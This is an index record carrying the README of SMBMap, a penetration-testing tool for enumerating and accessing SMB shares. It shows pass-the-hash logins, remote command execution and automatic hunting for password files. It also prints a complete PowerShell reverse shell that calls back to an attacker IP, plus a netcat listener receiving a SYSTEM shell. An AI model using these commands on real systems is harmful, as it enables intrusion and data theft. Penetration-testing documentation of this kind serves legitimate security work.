{"id":13475538,"url":"https://github.com/ShawnDEvans/smbmap","last_synced_at":"2025-03-27T00:31:31.225Z","repository":{"id":28802821,"uuid":"32325855","full_name":"ShawnDEvans/smbmap","owner":"ShawnDEvans","description":"SMBMap is a handy SMB enumeration tool","archived":false,"fork":false,"pushed_at":"2025-02-28T18:09:10.000Z","size":351,"stargazers_count":1868,"open_issues_count":32,"forks_count":357,"subscribers_count":64,"default_branch":"master","last_synced_at":"2025-03-26T22:06:13.328Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ShawnDEvans.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2015-03-16T13:15:00.000Z","updated_at":"2025-03-26T18:56:25.000Z","dependencies_parsed_at":"2022-07-15T21:30:47.610Z","dependency_job_id":"c0d541eb-a8cb-4eeb-a5c2-34bdb093f6c8","html_url":"https://github.com/ShawnDEvans/smbmap","commit_stats":null,"previous_names":[],"tags_count":19,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShawnDEvans%2Fsmbmap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShawnDEvans%2Fsmbmap/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShawnDEvans%2Fsmbmap/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShawnDEvans%2Fsmbmap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ShawnDEvans","download_url":"https://codeload.github.com/ShawnDEvans/smbmap/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245760739,"owners_count":20667886,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T16:01:21.317Z","updated_at":"2025-03-27T00:31:31.217Z","avatar_url":"https://github.com/ShawnDEvans.png","language":"Python","readme":"# SMBMap\n\nSMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.\n\nSome of the features have not been thoroughly tested, so changes will be forth coming as bugs are found. I only really find and fix the bugs while I'm on engagements, so progress is a bit slow. Any feedback or bug reports would be appreciated. \n\n\u003e **Note**\n\u003e SMBMap has been updated to Python3!\n\n## Installation\n\n```bash\n$ sudo pip3 install smbmap\n$ smbmap\nsmbmap\nusage: smbmap [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-s SHARE] [-d DOMAIN]\n [-P PORT] [-v] [--admin] [--no-banner] [--no-color] [--no-update] [-x COMMAND] [--mode CMDMODE]\n [-L | -r [PATH]] [-A PATTERN | -g FILE | --csv FILE] [--dir-only] [--no-write-check]\n [-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-F PATTERN] [--search-path PATH]\n [--search-timeout TIMEOUT] [--download PATH] [--upload SRC DST] [--delete PATH TO FILE] [--skip]\n...\n```\n\n## Features:\n- Pass-the-Hash Support\n- File upload/download/delete\n- Permission enumeration (writable share, meet Metasploit)\n- Remote Command Execution\n- Distrubted file content searching (beta!)\n- File name matching (with an auto downoad capability)\n- Host file parser supports IPs, host names, and CIDR\n- SMB sigining detection\n- Server version output\n- Kerberos support! (super beta)\n\n## Help\n```\nusage: smbmap.py [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-k] [--no-pass] [--dc-ip IP or Host] [-s SHARE] [-d DOMAIN] [-P PORT] [-v] [--signing] [--admin] [--no-banner] [--no-color] [--no-update]\n [--timeout SCAN_TIMEOUT] [-x COMMAND] [--mode CMDMODE] [-L | -r [PATH]] [-g FILE | --csv FILE] [--dir-only] [--no-write-check] [-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-A PATTERN] [-F PATTERN]\n [--search-path PATH] [--search-timeout TIMEOUT] [--download PATH] [--upload SRC DST] [--delete PATH TO FILE] [--skip]\n\n ________ ___ ___ _______ ___ ___ __ _______\n /\" )|\" \\ /\" || _ \"\\ |\" \\ /\" | /\"\"\\ | __ \"\\\n (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)\n \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/\n __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /\n /\" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\\n (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n https://github.com/ShawnDEvans/smbmap\n\noptions:\n -h, --help show this help message and exit\n\nMain arguments:\n -H HOST IP or FQDN\n --host-file FILE File containing a list of hosts\n -u USERNAME, --username USERNAME\n Username, if omitted null session assumed\n -p PASSWORD, --password PASSWORD\n Password or NTLM hash, format is LMHASH:NTHASH\n --prompt Prompt for a password\n -s SHARE Specify a share (default C$), ex 'C$'\n -d DOMAIN Domain name (default WORKGROUP)\n -P PORT SMB port (default 445)\n -v, --version Return the OS version of the remote host\n --signing Check if host has SMB signing disabled, enabled, or required\n --admin Just report if the user is an admin\n --no-banner Removes the banner from the top of the output\n --no-color Removes the color from output\n --no-update Removes the \"Working on it\" message\n --timeout SCAN_TIMEOUT\n Set port scan socket timeout. Default is .5 seconds\n\nKerberos settings:\n -k, --kerberos Use Kerberos authentication\n --no-pass Use CCache file (export KRB5CCNAME='~/current.ccache')\n --dc-ip IP or Host IP or FQDN of DC\n\nCommand Execution:\n Options for executing commands on the specified host\n\n -x COMMAND Execute a command ex. 'ipconfig /all'\n --mode CMDMODE Set the execution method, wmi or psexec, default wmi\n\nShard drive Search:\n Options for searching/enumerating the share of the specified host(s)\n\n -L List all drives on the specified host, requires ADMIN rights.\n -r [PATH] Recursively list dirs and files (no share\\path lists the root of ALL shares), ex. 'email/backup'\n -g FILE Output to a file in a grep friendly format, used with -r (otherwise it outputs nothing), ex -g grep_out.txt\n --csv FILE Output to a CSV file, ex --csv shares.csv\n --dir-only List only directories, ommit files.\n --no-write-check Skip check to see if drive grants WRITE access.\n -q Quiet verbose output. Only shows shares you have READ or WRITE on, and suppresses file listing when performing a search (-A).\n --depth DEPTH Traverse a directory tree to a specific depth. Default is 1 (root node).\n --exclude SHARE [SHARE ...]\n Exclude share(s) from searching and listing, ex. --exclude ADMIN$ C$'\n -A PATTERN Define a file name pattern (regex) that auto downloads a file on a match (requires -r), not case sensitive, ex '(web|global).(asax|config)'\n\nFile Content Search:\n Options for searching the content of files (must run as root), kind of experimental\n\n -F PATTERN File content search, -F '[Pp]assword' (requires admin access to execute commands, and PowerShell on victim host)\n --search-path PATH Specify drive/path to search (used with -F, default C:\\Users), ex 'D:\\HR\\'\n --search-timeout TIMEOUT\n Specifcy a timeout (in seconds) before the file search job gets killed. Default is 300 seconds.\n\nFilesystem interaction:\n Options for interacting with the specified host's filesystem\n\n --download PATH Download a file from the remote system, ex.'C$\\temp\\passwords.txt'\n --upload SRC DST Upload a file to the remote system ex. '/tmp/payload.exe C$\\temp\\payload.exe'\n --delete PATH TO FILE\n Delete a remote file, ex. 'C$\\temp\\msf.exe'\n --skip Skip delete file confirmation prompt\n\nExamples:\n\n$ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1\n$ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20\n$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -Hh 10.1.3.30 -x 'net group \"Domain Admins\" /domain'\n```\n\n## Default Output:\n```\n$ ./smbmap.py -H 192.168.86.214 -u Administrator -p asdf1234 \n\n ________ ___ ___ _______ ___ ___ __ _______\n /\" )|\" \\ /\" || _ \"\\ |\" \\ /\" | /\"\"\\ | __ \"\\\n (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)\n \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/\n __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /\n /\" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\\n (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)\n -----------------------------------------------------------------------------\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n https://github.com/ShawnDEvans/smbmap\n\n[*] Detected 1 hosts serving SMB \n[*] Established 1 SMB connections(s) and 1 authentidated session(s) \n \n[+] IP: 192.168.86.214:445\tName: shawnevans-pc.lan \tStatus: ADMIN!!! \t\n\tDisk \tPermissions\tComment\n\t---- \t-----------\t-------\n\tADMIN$ \tREAD, WRITE\tRemote Admin\n\tC$ \tREAD, WRITE\tDefault share\n\tIPC$ \tNO ACCESS\tRemote IPC\n\tMS Publisher Color Printer \tNO ACCESS\tMS Publisher Color Printer\n\tprint$ \tREAD, WRITE\tPrinter Drivers\n\tTemp \tREAD, WRITE\t\n\tUsers \tREAD, WRITE\n```\n\n## Command execution:\n```\n$ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group \"Domain Admins\" /domain' -H 192.168.2.50\n[+] Finding open SMB ports....\n[+] User SMB session established...\n[+] IP: 192.168.2.50:445 Name: unknown\nGroup name Domain Admins\nComment Designated administrators of the domain\n\nMembers\n\n-------------------------------------------------------------------------------\nabcadmin\nThe command completed successfully.\n```\n\n## Non recursive path listing (ls):\n```\n$ ./smbmap.py -H 192.168.86.214 -u Administrator -p asdf1234 -r c$ -q \n\n ________ ___ ___ _______ ___ ___ __ _______\n /\" )|\" \\ /\" || _ \"\\ |\" \\ /\" | /\"\"\\ | __ \"\\\n (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)\n \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/\n __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /\n /\" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\\n (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)\n -----------------------------------------------------------------------------\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n https://github.com/ShawnDEvans/smbmap\n\n[*] Detected 1 hosts serving SMB \n[*] Established 1 SMB connections(s) and 1 authentidated session(s)\n \n[+] IP: 192.168.86.214:445\tName: shawnevans-pc.lan \tStatus: ADMIN!!! \t\n\tDisk \tPermissions\tComment\n\t---- \t-----------\t-------\n\tADMIN$ \tREAD, WRITE\tRemote Admin\n\tC$ \tREAD, WRITE\tDefault share\n\t./C$\n\tdr--r--r-- 0 Wed Apr 22 14:50:29 2015\t$Recycle.Bin\n\tfr--r--r-- 4284 Wed Oct 3 10:16:24 2018\tActivityLog.xsl\n\tdr--r--r-- 0 Tue Nov 21 10:47:06 2023\tConfig.Msi\n\tdr--r--r-- 0 Thu Apr 9 14:46:57 2015\tDocuments and Settings\n\tdr--r--r-- 0 Mon Feb 15 16:45:44 2021\tiDEFENSE\n\tdr--r--r-- 0 Thu Sep 24 20:52:23 2015\tnasm\n\tfr--r--r-- 2513149952 Tue Nov 21 13:21:16 2023\tpagefile.sys\n\tdr--r--r-- 0 Thu Apr 9 14:46:48 2015\tPerfLogs\n\tdw--w--w-- 0 Mon Oct 30 09:20:53 2023\tProgram Files\n\tdw--w--w-- 0 Fri Nov 17 03:27:46 2023\tProgram Files (x86)\n\tdr--r--r-- 0 Wed Jun 14 13:39:51 2023\tProgramData\n\tdr--r--r-- 0 Mon Oct 1 12:05:49 2018\tPython27\n\tdr--r--r-- 0 Thu Apr 9 13:49:31 2015\tRecovery\n\tdr--r--r-- 0 Thu Oct 15 13:04:27 2015\tScripts\n\tdr--r--r-- 0 Tue Nov 21 11:13:24 2023\tSystem Volume Information\n\tfr--r--r-- 5194752 Mon Jan 18 11:12:13 2016\tSystem.Management.Automation.dll\n\tfr--r--r-- 0 Fri May 19 13:51:42 2023\tTBIWYRVUOD.txt\n\tdr--r--r-- 0 Thu Nov 23 13:04:51 2023\tTemp\n\tfr--r--r-- 15812 Wed Oct 3 10:16:45 2018\ttemp.log\n\tfr--r--r-- 18 Thu Feb 13 15:55:55 2020\ttest.txt\n\tdr--r--r-- 0 Wed Jun 21 12:43:46 2023\tTools\n\tdw--w--w-- 0 Thu Nov 23 13:04:51 2023\tUsers\n\tdr--r--r-- 0 Thu Nov 23 13:04:51 2023\tWindows\n\tprint$ \tREAD, WRITE\tPrinter Drivers\n\tTemp \tREAD, WRITE\t\n\tUsers \tREAD, WRITE\t\n```\n\n## Recursive listing \n```\n$ ./smbmap.py -H 192.168.86.179 -u Administrator -p asdf1234 -r Tools --depth 2 --no-banner -q\n[*] Detected 1 hosts serving SMB \n[*] Established 1 SMB connections(s) and 1 authentidated session(s)\n \n[+] IP: 192.168.86.179:445\tName: desktop-m8n2dcc.lan \tStatus: ADMIN!!! \t\n\tDisk \tPermissions\tComment\n\t---- \t-----------\t-------\n\tADMIN$ \tREAD, WRITE\tRemote Admin\n\tC \tREAD ONLY\t\n\tC$ \tREAD, WRITE\tDefault share\n\tIPC$ \tREAD ONLY\tRemote IPC\n\tTools \tREAD, WRITE\t\n\t./Tools\n\tdr--r--r-- 0 Fri Nov 24 08:51:45 2023\t.\n\tdr--r--r-- 0 Fri Nov 24 08:51:45 2023\t..\n\tfr--r--r-- 0 Fri May 19 13:39:58 2023\tAZNJSOWDQU\n\tdr--r--r-- 0 Mon May 15 15:34:30 2023\tCVE-2020-0688_EXP\n\tfr--r--r-- 13821 Mon May 15 15:34:30 2023\tDebug.txt\n\tdr--r--r-- 0 Mon May 15 15:34:30 2023\tdiskmon\n\tfr--r--r-- 13821 Mon May 15 15:34:30 2023\tErrors.txt\n\tfr--r--r-- 0 Fri May 19 13:42:42 2023\tGNDBLUQZMA.txt\n\tfr--r--r-- 0 Fri May 19 13:40:56 2023\tHOQVWGAXEG\n\tfr--r--r-- 2833 Mon May 15 15:34:30 2023\tkiwi_passwords.yar\n\tfr--r--r-- 2850 Mon May 15 15:34:30 2023\tmimicom.idl\n\tdr--r--r-- 0 Mon May 15 15:34:30 2023\tportmon\n\tdr--r--r-- 0 Mon May 15 15:34:30 2023\tprocexplorer\n\tdr--r--r-- 0 Mon May 15 15:34:30 2023\tProcMon\n\tfr--r--r-- 4951 Mon May 15 15:34:30 2023\tREADME.md\n\tfr--r--r-- 4605 Mon May 15 15:34:30 2023\tREADME.txt\n\tfr--r--r-- 0 Fri May 19 13:37:17 2023\tRZFNUHSYET\n\tfr--r--r-- 123515 Mon May 15 15:34:30 2023\tSharePoint - URL Extensions - 18MAR2012.pdf\n\tfr--r--r-- 2810 Mon May 15 15:34:30 2023\tSharePoint-UrlExtensions-18Mar2012.txt\n\tfr--r--r-- 3028050 Mon May 15 15:34:30 2023\tSharePointURLBrute v1.1.exe\n\tfr--r--r-- 8423 Mon May 15 15:34:30 2023\tSharePointURLBrute v1.1.pl\n\tfr--r--r-- 116 Mon May 15 15:34:30 2023\tUrlsFound.txt\n\tdr--r--r-- 0 Mon May 15 15:34:30 2023\tWin32\n\tdr--r--r-- 0 Mon May 15 15:34:30 2023\tx64\n\tdr--r--r-- 0 Mon May 15 15:34:30 2023\tysoserial\n\t./Tools//CVE-2020-0688_EXP\n\tdr--r--r-- 0 Mon May 15 15:34:30 2023\t.\n\tdr--r--r-- 0 Mon May 15 15:34:30 2023\t..\n\tdr--r--r-- 0 Mon May 15 15:34:30 2023\t.git\n\tfr--r--r-- 4756 Mon May 15 15:34:30 2023\tCVE-2020-0688_EXP.py\n\tfr--r--r-- 0 Mon May 15 15:34:30 2023\tnopsec.test'\n\tfr--r--r-- 2169 Mon May 15 15:34:30 2023\tREADME.md\n\tdr--r--r-- 0 Mon May 15 15:34:30 2023\tysoserial-1.32\n\n```\n\n## Recursive Filename Pattern Search\n```\n$ ./smbmap.py -H 192.168.86.179 -u Administrator -p asdf1234 -r 'c$/program files' --depth 2 -A '(password|config)'\n\n ________ ___ ___ _______ ___ ___ __ _______\n /\" )|\" \\ /\" || _ \"\\ |\" \\ /\" | /\"\"\\ | __ \"\\\n (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)\n \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/\n __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /\n /\" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\\n (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)\n -----------------------------------------------------------------------------\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n https://github.com/ShawnDEvans/smbmap\n\n[*] Detected 1 hosts serving SMB \n[*] Established 1 SMB connections(s) and 1 authentidated session(s)\n[*] Performing file name pattern match!. \n[+] Match found! Downloading: C$/program files/Amazon Web Services, Inc/Amazon WorkSpaces/Microsoft.Extensions.Configuration.Abstractions.dll\n[+] Starting download: C$\\program files\\Amazon Web Services, Inc\\Amazon WorkSpaces\\Microsoft.Extensions.Configuration.Abstractions.dll (21368 bytes)\n[+] File output to: /home/shawnevans/tools/smbmap/smbmap/192.168.86.179-C_program files_Amazon Web Services, Inc_Amazon WorkSpaces_Microsoft.Extensions.Configuration.Abstractions.dll\n[+] Match found! Downloading: C$/program files/Amazon Web Services, Inc/Amazon WorkSpaces/Microsoft.Extensions.Configuration.Binder.dll\n[+] Starting download: C$\\program files\\Amazon Web Services, Inc\\Amazon WorkSpaces\\Microsoft.Extensions.Configuration.Binder.dll (25464 bytes)\n[+] File output to: /home/shawnevans/tools/smbmap/smbmap/192.168.86.179-C_program files_Amazon Web Services, Inc_Amazon WorkSpaces_Microsoft.Extensions.Configuration.Binder.dll\n[+] Match found! Downloading: C$/program files/Amazon Web Services, Inc/Amazon WorkSpaces/Microsoft.Extensions.Configuration.dll\n[+] Starting download: C$\\program files\\Amazon Web Services, Inc\\Amazon WorkSpaces\\Microsoft.Extensions.Configuration.dll (27512 bytes)\n[+] File output to: /home/shawnevans/tools/smbmap/smbmap/192.168.86.179-C_program files_Amazon Web Services, Inc_Amazon WorkSpaces_Microsoft.Extensions.Configuration.dll\n[+] Match found! Downloading: C$/program files/Amazon Web Services, Inc/Amazon WorkSpaces/Microsoft.Extensions.Logging.Configuration.dll\n[+] Starting download: C$\\program files\\Amazon Web Services, Inc\\Amazon WorkSpaces\\Microsoft.Extensions.Logging.Configuration.dll (20344 bytes)\n\n```\n\n## Scan for SMB signing support\n```\n$ ./smbmap.py --host-file local.txt --signing\n\n ________ ___ ___ _______ ___ ___ __ _______\n /\" )|\" \\ /\" || _ \"\\ |\" \\ /\" | /\"\"\\ | __ \"\\\n (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)\n \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/\n __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /\n /\" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\\n (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)\n -----------------------------------------------------------------------------\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n https://github.com/ShawnDEvans/smbmap\n\n[*] Detected 3 hosts serving SMB \n[*] Established 3 SMB connections(s) and 2 authentidated session(s) \n[-] 192.168.86.204 \tsigning enabled (not required)\n[!] 192.168.86.213 \tsigning disabled\n[+] 192.168.86.179 \tsigning required\n```\n## Get version info\n```\n$ ./smbmap.py --host-file local.txt -v\n\n ________ ___ ___ _______ ___ ___ __ _______\n /\" )|\" \\ /\" || _ \"\\ |\" \\ /\" | /\"\"\\ | __ \"\\\n (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)\n \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/\n __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /\n /\" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\\n (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)\n -----------------------------------------------------------------------------\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n https://github.com/ShawnDEvans/smbmap\n\n[*] Detected 3 hosts serving SMB \n[*] Established 3 SMB connections(s) and 2 authentidated session(s) \n[+] 192.168.86.204 is running Windows 6.1 Build 7601 (name:SHAWNEVANS-PC) (domain:SHAWNEVANS-PC)\n[+] 192.168.86.213 is running Windows 6.1 Build 7601 (name:SHAWNEVANS-PC) (domain:SHAWNEVANS-PC)\n[+] 192.168.86.179 is running Windows 10.0 Build 19041 (name:DESKTOP-M8N2DCC) (domain:DESKTOP-M8N2DCC)\n\n```\n## File Content Searching:\n```\n$ python smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'\n[+] Finding open SMB ports....\n[+] User SMB session established on 192.168.0.99...\n[+] User SMB session established on 192.168.0.85...\n[+] User SMB session established on 192.168.0.89...\n[+] File search started on 1 hosts...this could take a while\n[+] Job 4650e5a97b9f4ca884613f4b started on 192.168.0.99, result will be stored at C:\\Temp\\4650e5a97b9f4ca884613f4b.txt\n[+] File search started on 2 hosts...this could take a while\n[+] Job e0c822a802eb455f96259f33 started on 192.168.0.85, result will be stored at C:\\Windows\\TEMP\\e0c822a802eb455f96259f33.txt\n[+] File search started on 3 hosts...this could take a while\n[+] Job 0a5d352bf2bd4e288e0f8f36 started on 192.168.0.89, result will be stored at C:\\Temp\\0a5d352bf2bd4e288e0f8f36.txt\n[+] Grabbing search results, be patient, share drives tend to be big...\n[+] Job 1 of 3 completed on 192.168.0.85...\n[+] File successfully deleted: C$\\Windows\\TEMP\\e0c822a802eb455f96259f33.txt\n[+] Job 2 of 3 completed on 192.168.0.89...\n[+] File successfully deleted: C$\\Temp\\0a5d352bf2bd4e288e0f8f36.txt\n[+] Job 3 of 3 completed on 192.168.0.99...\n[+] File successfully deleted: C$\\Temp\\4650e5a97b9f4ca884613f4b.txt\n[+] All jobs complete\nHost: 192.168.0.85 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]\nNo matching patterns found\n\nHost: 192.168.0.89 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]\nC:\\Users\\terdf\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\JY5MGKVO\\salesmaps[1].htm\nC:\\Users\\terdf\\OldFiles\\Cache_2013522\\Content.IE5\\JY5MGKVO\\salesmaps[1].htm\n\nHost: 192.168.0.99 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]\nC:\\Users\\biffh\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L7W17OPZ\\static.olark[1].xml\nC:\\Users\\biffh\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\MIY2POGJ\\validation[2].js\nC:\\Users\\biffh\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\NV1MNBWA\\Docs[1].htm\nC:\\Users\\biffh\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\NV1MNBWA\\Salesmaps[1].htm\n```\n\n## Drive Listing:\nThis feature was added to complement the file content searching feature\n\n```\n$ python smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L\n[!] Missing domain...defaulting to WORKGROUP\n[+] Finding open SMB ports....\n[+] User SMB session established...\n[+] IP: 192.168.1.24:445 Name: unknown\n[+] Host 192.168.1.24 Local Drives: C:\\ D:\\\n[+] Host 192.168.1.24 Net Drive(s):\n E: \\\\vboxsrv\\Public VirtualBox Shared Folders\n```\n\n\n\n## Nifty Shell:\nRun Powershell Script on Victim SMB host (change the IP in the code to your IP addres, i.e where the shell connects back to)\n```\n$ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command \"function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=\"\"\"\"192.168.0.153\"\"\"\"; $port=\"\"\"\"4445\"\"\"\";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=\"\"\"\"cmd.exe\"\"\"\" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out=\"\"\"\" \"\"\"\"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};\"'\n[+] Finding open SMB ports....\n[+] User SMB session established...\n[+] IP: 192.168.2.50:445 Name: unkown\n[!] Error encountered, sharing violation, unable to retrieve output\n```\n\n## Attackers Netcat Listener:\n```\n$ nc -l 4445\nMicrosoft Windows [Version 6.1.7601]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32\u003ewhoami\n nt authority\\system\n```\n","funding_links":[],"categories":["Tools","Uncategorized","Python","Network Tools","Python (1887)","Samba Enumerating","Awesome Penetration Testing (\"https://github.com/Muhammd/Awesome-Pentest\")"],"sub_categories":["Network Tools","Uncategorized","Network Reconnaissance Tools","Penetration Testing Report Templates","Tools"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FShawnDEvans%2Fsmbmap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FShawnDEvans%2Fsmbmap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FShawnDEvans%2Fsmbmap/lists"}